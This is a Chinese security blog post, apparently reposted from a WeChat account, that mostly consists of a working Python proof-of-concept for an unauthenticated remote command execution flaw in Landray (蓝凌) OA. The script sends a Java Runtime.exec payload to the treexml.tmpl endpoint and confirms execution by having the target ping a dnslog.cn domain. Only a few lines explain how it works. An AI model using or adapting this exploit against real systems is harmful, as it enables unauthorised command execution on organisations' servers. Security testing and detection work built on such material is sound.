简单poc编写采用最近的蓝凌未授权rce(python)
2022-8-7 15:47:25 Author: 红蓝攻防实验室(查看原文) 阅读量:167 收藏

这里我们借助burp的辅助工具 去帮我们构造前期的请求包 只需要专注逻辑处理

这里就可以用python对这个包发起请求

好了 不废话 上正文

蓝凌未授权rce poc

import argparseimport sysimport requestsimport timeimport random

def random_str(n): str = '' for i in range(n): str += chr(random.randint(97, 122)) return str

cookie = random_str(26)headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:100.0) Gecko/20000101 Firefox/100.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

def get_domain_or_check(type): if type == 1: url = "http://www.dnslog.cn:80/getdomain.php" cookies = {"PHPSESSID": cookie} res = requests.get(url, headers=headers, cookies=cookies) print("[+] dnslog:" + res.text) return res.text elif type == 2: url = "http://dnslog.cn:80/getrecords.php?t=0.18836534176098696" cookies = {"PHPSESSID": cookie} time.sleep(0.8) res = requests.get(url, headers=headers, cookies=cookies) if len(res.text) > 2: print("[+] Success 漏洞存在: " + res.text) else: print("[+] 漏洞不存在")

def test(url): cmd = "ping " + get_domain_or_check(1) headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "Connection": "close", "Accept": "*/*", "Accept-Language": "en", "Content-Type": "application/x-www-form-urlencoded", "Pragma": "no-cache", "Accept-Encoding": "gzip, deflate"} data = {"s_bean": "ruleFormulaValidate", "script": "try {String cmd = \"" + str( cmd) + "\";Process process = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}"} if url[-1] != "/": url = url + "/data/sys-common/treexml.tmpl" else: url = url + "data/sys-common/treexml.tmpl" res = requests.post(url, headers=headers, data=data) if res.status_code == 200: get_domain_or_check(2) else: print("[+] 状态码" + str(res.status_code) + " 漏洞不存在")

def parse_args(): parser = argparse.ArgumentParser(epilog="\tExample: \r\npython " + sys.argv[0] + " -u target") parser._optionals.title = "OPTIONS" parser.add_argument('-u', '--url', help="url.", required=True, type=str)
return parser.parse_args()

if __name__ == '__main__': print("\033[1;32mAuthor: by567 暗\033[0m") args = parse_args() url = args.url    test(url)

这里分析了 dnslog的getdomain.php和getrecords.php来获取dnslog测试结果

通过getdomain.php获取测试dnslog 这里PHPSESSID设置我们构造的这样获取结果才能获取到

接着就是 发起请求 对数据包进行分析处理

代码写的比较low 大佬勿喷


文章来源: http://mp.weixin.qq.com/s?__biz=MzU2OTkwNzIxOA==&mid=2247483952&idx=1&sn=019733f010b3e8ddc090a8285521fa59&chksm=fcf6c34dcb814a5b1274b5a6895e0b282abcd77993efb896fb00a0f2e89ae26fce9018ec6e1f#rd
如有侵权请联系:admin#unsafe.sh